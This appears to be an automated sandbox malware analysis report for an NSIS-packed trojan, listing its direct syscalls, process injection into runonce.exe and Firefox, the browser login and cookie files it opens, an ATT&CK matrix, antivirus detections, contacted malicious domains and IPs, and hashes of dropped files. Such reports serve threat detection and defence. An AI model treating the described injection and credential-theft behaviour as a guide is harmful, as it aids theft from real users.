        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3778314A mov eax, dword ptr fs:[00000030h]3_2_3778314A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3778314A mov eax, dword ptr fs:[00000030h]3_2_3778314A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3778314A mov eax, dword ptr fs:[00000030h]3_2_3778314A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377C5149 mov eax, dword ptr fs:[00000030h]3_2_377C5149
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377AF13E mov eax, dword ptr fs:[00000030h]3_2_377AF13E
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777A130 mov eax, dword ptr fs:[00000030h]3_2_3777A130
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37727128 mov eax, dword ptr fs:[00000030h]3_2_37727128
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37727128 mov eax, dword ptr fs:[00000030h]3_2_37727128
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F510D mov eax, dword ptr fs:[00000030h]3_2_376F510D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37720118 mov eax, dword ptr fs:[00000030h]3_2_37720118
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF113 mov eax, dword ptr fs:[00000030h]3_2_376EF113
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF113 mov eax, dword ptr fs:[00000030h]3_2_376EF113
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF113 mov eax, dword ptr fs:[00000030h]3_2_376EF113

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtReadFile: Direct from: 0x77D429FC
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtQuerySystemInformation: Direct from: 0x77D42D1C
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtProtectVirtualMemory: Direct from: 0x77D37A4E
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtMapViewOfSection: Direct from: 0x77D42C3C
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtWriteVirtualMemory: Direct from: 0x77D42D5C
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtAllocateVirtualMemory: Direct from: 0x77D42B1C
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtResumeThread: Direct from: 0x77D435CC
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtDelayExecution: Direct from: 0x77D42CFC
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtReadVirtualMemory: Direct from: 0x77D42DAC
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtOpenKeyEx: Direct from: 0x77D43BBC
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtQueryInformationToken: Direct from: 0x77D42BCC
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtSetInformationProcess: Direct from: 0x77D42B7C
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtNotifyChangeKey: Direct from: 0x77D43B4C
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtCreateFile: Direct from: 0x77D42F0C
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtQueryValueKey: Direct from: 0x77D42B0C
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtOpenSection: Direct from: 0x77D42D2C
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtQueryVolumeInformationFile: Direct from: 0x77D42E4C
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtDeviceIoControlFile: Direct from: 0x77D42A0C
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtQuerySystemInformation: Direct from: 0x77D447EC
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtOpenFile: Direct from: 0x77D42CEC
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtAllocateVirtualMemory: Direct from: 0x77D4480C
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtProtectVirtualMemory: Direct from: 0x77D42EBC
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtWriteVirtualMemory: Direct from: 0x77D4482C
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtOpenKeyEx: Direct from: 0x77D42ABC
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtCreateUserProcess: Direct from: 0x77D4363C
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtQueryInformationProcess: Direct from: 0x77D42B46
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtResumeThread: Direct from: 0x77D42EDC
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtQueryAttributesFile: Direct from: 0x77D42D8C
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtSetInformationThread: Direct from: 0x77D42A6C
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtSetInformationThread: Direct from: 0x77D36319
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtCreateKey: Direct from: 0x77D42B8C
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe NtClose: Direct from: 0x77D42A8C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exe Section loaded: NULL target: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\ulACwpUCSU.exe Section loaded: NULL target: C:\Windows\SysWOW64\runonce.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\runonce.exe Section loaded: NULL target: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe protection: read write
        Source: C:\Windows\SysWOW64\runonce.exe Section loaded: NULL target: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\runonce.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
        Source: C:\Windows\SysWOW64\runonce.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\runonce.exe Thread register set: target process: 1204
        Source: C:\Windows\SysWOW64\runonce.exe Thread APC queued: target process: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
        Source: C:\Users\user\Desktop\ulACwpUCSU.exe Process created: C:\Users\user\Desktop\ulACwpUCSU.exe "C:\Users\user\Desktop\ulACwpUCSU.exe"
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe Process created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"
        Source: C:\Windows\SysWOW64\runonce.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\ulACwpUCSU.exe Code function: 0_2_00405D58 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA

        Stealing of Sensitive Information

        Source: Yara match, File source: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.7373754764.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000006.00000002.7372491804.0000000001410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000002.3044504432.00000000373A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.7373930298.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000004.00000002.7373346387.00000000037A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\runonce.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
        Source: C:\Windows\SysWOW64\runonce.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\runonce.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\runonce.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\runonce.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\runonce.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\runonce.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\runonce.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
        Source: C:\Windows\SysWOW64\runonce.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

        Remote Access Functionality

        Source: Yara match, File source: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.7373754764.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000006.00000002.7372491804.0000000001410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000002.3044504432.00000000373A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.7373930298.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000004.00000002.7373346387.00000000037A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 311 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
        Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 2 Virtualization/Sandbox Evasion | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 311 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 1 Clipboard Data | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Abuse Elevation Control Mechanism | LSA Secrets | 3 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 4 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
        [Behavior graph (image not reproduced). Behavior Graph ID: 1451688; Sample: ulACwpUCSU.exe; Start date: 04/06/2024; Architecture: WINDOWS; Score: 100]

        Source | Detection | Scanner | Label | Link
        ulACwpUCSU.exe | 100% | Avira | TR/AD.NsisInject.edpwl |
        ulACwpUCSU.exe | 66% | ReversingLabs | Win32.Trojan.Leonem |
        ulACwpUCSU.exe | 35% | Virustotal | | Browse
        ulACwpUCSU.exe | 100% | Joe Sandbox ML | |

        Source | Detection | Scanner | Label | Link
        C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll | 0% | ReversingLabs | |

        No Antivirus matches
                      unknown
                      https://www.google.comulACwpUCSU.exe, 00000003.00000003.2866087352.00000000075B5000.00000004.00000020.00020000.00000000.sdmp, ulACwpUCSU.exe, 00000003.00000003.2865688162.0000000007560000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdulACwpUCSU.exe, 00000003.00000001.2708155716.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://nsis.sf.net/NSIS_ErrorulACwpUCSU.exe, ulACwpUCSU.exe, 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp, ulACwpUCSU.exe, 00000000.00000000.2283075526.0000000000409000.00000008.00000001.01000000.00000003.sdmp, ulACwpUCSU.exe, 00000003.00000000.2705727166.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214ulACwpUCSU.exe, 00000003.00000001.2708155716.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdulACwpUCSU.exe, 00000003.00000001.2708155716.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://apis.google.comulACwpUCSU.exe, 00000003.00000003.2866087352.00000000075B5000.00000004.00000020.00020000.00000000.sdmp, ulACwpUCSU.exe, 00000003.00000003.2865688162.0000000007560000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
162.240.81.18 | tintasmaiscor.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
162.0.237.22 | www.astralavenue.xyz | Canada | 22612 | NAMECHEAP-NETUS | true
192.207.62.21 | 02.32.jtrhc.fun | United States | 394180 | HOSTBREWUS | true
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true
64.190.62.22 | www.nurse-job2535.life | United States | 11696 | NBS11696US | true
91.195.240.19 | parkingpage.namecheap.com | Germany | 47846 | SEDO-ASDE | true
142.250.217.174 | drive.google.com | United States | 15169 | GOOGLEUS | false
34.120.137.41 | connect.hostinger.com | United States | 15169 | GOOGLEUS | false
23.82.12.29 | www.seductionsessions.co.uk | United States | 30633 | LEASEWEB-USA-WDCUS | true
160.124.114.188 | www.click-advertising.net | South Africa | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | true
172.67.205.56 | www.barrettdigitalart.com | United States | 13335 | CLOUDFLARENETUS | true
217.70.184.50 | webredir.vip.gandi.net | France | 29169 | GANDI-ASDomainnameregistrar-httpwwwgandinetFR | true
142.250.217.193 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1451688
                      Start date and time:2024-06-04 14:31:03 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 18m 57s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                      Run name:Suspected Instruction Hammering
                      Number of analysed new started processes analysed:6
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:2
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Sample name:ulACwpUCSU.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@7/22@30/13
                      EGA Information:
                      • Successful, ratio: 75%
                      HCA Information:
                      • Successful, ratio: 87%
                      • Number of executed functions: 100
                      • Number of non-executed functions: 274
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                      • Excluded IPs from analysis (whitelisted): 131.253.33.203
                      • Excluded domains from analysis (whitelisted): icePrime.a-0003.dc-msedge.net, ctldl.windowsupdate.com, a-0003.dc-msedge.net, nexusrules.officeapps.live.com, api-msn-com.a-0003.a-msedge.net
                      • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
08:34:53 | API Interceptor | 24237183x Sleep call for process: runonce.exe modified
                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                        Category:dropped
                                        Size (bytes):970
                                        Entropy (8bit):3.3017794089075707
                                        Encrypted:false
                                        SSDEEP:12:8wl0s0m/3BVSXzEXnOlLBAZlYK2jqW+fI5jj8EQ1J3HAGACagiNL4t2YCBTo:8AJ/Bbe2bYKY+fHpr3HAGACaV5JT
                                        MD5:1F7DFCCD9C95414EF9191E4F9ADDF36A
                                        SHA1:A969BBD5BF31FDAC2085901E10B2725BEB4E9BED
                                        SHA-256:82BF4790958076AF1AB564E247BADF3D175BA4D8585CF9350654E0B94455466D
                                        SHA-512:EDA9E341A7C742E809648841312352582129CB5FED2C436E820EE20452A79081C4A7E217B745413B5552C85DD2CAFCBA82E17551F656DD76910D3B6ABB21B034
                                        Malicious:false
                                        Reputation:low
                                        Process:C:\Windows\SysWOW64\runonce.exe
                                        File Type:SQLite 3.x database, last written using SQLite version 3041002, page size 2048, file counter 3, database pages 92, cookie 0x3a, schema 4, UTF-8, version-valid-for 3
                                        Category:dropped
                                        Size (bytes):188416
                                        Entropy (8bit):0.9926780404836638
                                        Encrypted:false
                                        SSDEEP:192:mavrNdl9bH9KTj8bGA/D3n0mCTV3U25G4qWlrrFB3nKIq9ucs:mavrbl9D9TDn0mCTV3PG43lrfKIq9ps
                                        MD5:BE092D0FC1A86091764AABD40B25CB9E
                                        SHA1:1372556BBC211898F393CC02C4285705AACAE3D7
                                        SHA-256:3A83C0434C667BB30FD9D85D908E652A2569239BBD61079849F299409A48D545
                                        SHA-512:EA6D16D484395A05D836A066248D355DA4C3C7A7B11CA612A87535395C6FDDDF1171624B6B45E41C12C284B5213CE9D22450E212ED0D195280653A4DF19F7892
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):50
                                        Entropy (8bit):4.558562939644915
                                        Encrypted:false
                                        SSDEEP:3:RlvjDkAQLQIfLBJXmgxv:R1ZQkIP2I
                                        MD5:A6216EF9FBE57B11DEEB1B1FD840C392
                                        SHA1:E554348623EF9ADDDE2FB3F2742D5CC1EF240AB1
                                        SHA-256:EDF6C9DA71DAF3B3DA2E89A1BC6B9F4B812F18FC133CF4706A3AE983E4040946
                                        SHA-512:AF5FDD8419B8384361BBEA7600B4DA7860771DD974D3B2D747C6E1C4F7E4DF49FE4BE5FA2320E9041343C8D2AB5912BE1CF279B61ED2A96954C1C2ED05AA0122
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:[Common]..Windows=user32::EnumWindows(i r1 ,i 0)..
                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):11264
                                        Entropy (8bit):5.779474184733856
                                        Encrypted:false
                                        SSDEEP:96:zPDYcJ+nx4vVp76JX7zBlkCg21Fxz4THxtrqw1at0JgwLEjo+OB3yUVCdl/wNj+y:zPtkuWJX7zB3kGwfy0nyUVsxCjOM61u
                                        MD5:6F5257C0B8C0EF4D440F4F4FCE85FB1B
                                        SHA1:B6AC111DFB0D1FC75AD09C56BDE7830232395785
                                        SHA-256:B7CCB923387CC346731471B20FC3DF1EAD13EC8C2E3147353C71BB0BD59BC8B1
                                        SHA-512:A3CC27F1EFB52FB8ECDA54A7C36ADA39CEFEABB7B16F2112303EA463B0E1A4D745198D413EEBB3551E012C84A20DCDF4359E511E51BC3F1A60B13F1E3BAD1AA8
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Joe Sandbox View:
                                        • Filename: fJuwM4Bwi7.exe, Detection: malicious
                                        • Filename: Factura 02297-23042024.exe, Detection: malicious
                                        • Filename: anebilledes.exe, Detection: malicious
                                        • Filename: Purchase Order1613400027654123.pdf.exe, Detection: malicious
                                        • Filename: windows.10.codec.pack.v2.2.0.setup.exe, Detection: malicious
                                        Reputation:moderate, very likely benign file
                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):557077
                                        Entropy (8bit):7.079350311821964
                                        Encrypted:false
                                        SSDEEP:12288:BArogB21UpSFMz8s02Npjdo6G9/Us9i1d1:BATwqpss0gzkUs9ed1
                                        MD5:2BE0DFCA1F58BBC291C5FEBCB520F01F
                                        SHA1:DA8822A610E7BB3156C6DC9B9C344652DC1BDFE3
                                        SHA-256:9576CA879A620F995613754EDCF928C9771AB08383BA29048312F763AF02A4F8
                                        SHA-512:1D45D65DEDCDFC835E9917C6CF103848DE662E3DF83FB9319371D5DD18D9EE166052A9F31C2260FF00E9962F165D92D2DC863539800B78C1BF5675913E2CEB0D
                                        Malicious:false
                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):3146
                                        Entropy (8bit):4.791974532841942
                                        Encrypted:false
                                        SSDEEP:48:3XPylQdRwtj51cUxE84gEsggxL3oW/xFJPDV4EFUXBR27Qy18ZC0n2pZ6tc73:al6RO51TE81mgl3oWJFJ9UXekyOZ2Omz
                                        MD5:63FE645623536FBA3E2331E03CC60A1C
                                        SHA1:236AFE8B9CE94209890C73329BCFEC36E2772F7B
                                        SHA-256:D214B61BCC0A292DF774AED4655752AF5ACB44E880BD82082AB716AE34DCEDBF
                                        SHA-512:EF6432B6D5107883F6CFA5EED753CA96BE4E59D89A883DA67D8112A7BA7950A3462F2DEE07228B89923569C727145396254C0EB10B84DFAE1632CEC17074413D
                                        Malicious:false
                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):4180
                                        Entropy (8bit):4.9321374408025465
                                        Encrypted:false
                                        SSDEEP:96:48Ez2ekD6/CkklLdgw/Hk4hHe1egefyK2WP3d+lw/6olYP1eI7:/EK4/+uwHk5DeaK2BW6rcI7
                                        MD5:568E524C05FD8EE41882BBC14464C6D3
                                        SHA1:8130F25AD135621E2F451EFD20A3B180C01A3F66
                                        SHA-256:D923009286A94EA38855A2BADF858969428C2DA0E65AC3DAE8CB886BF3EE2BF7
                                        SHA-512:00F9B3763CA9223002E421294A7FD69A9E9FFC2AF399F48226FDBB0523A82AA5C4E6DCFDCA073FCFA5B21DF8AC397D0F6701CB47D8750915D370B627927CC308
                                        Malicious:false
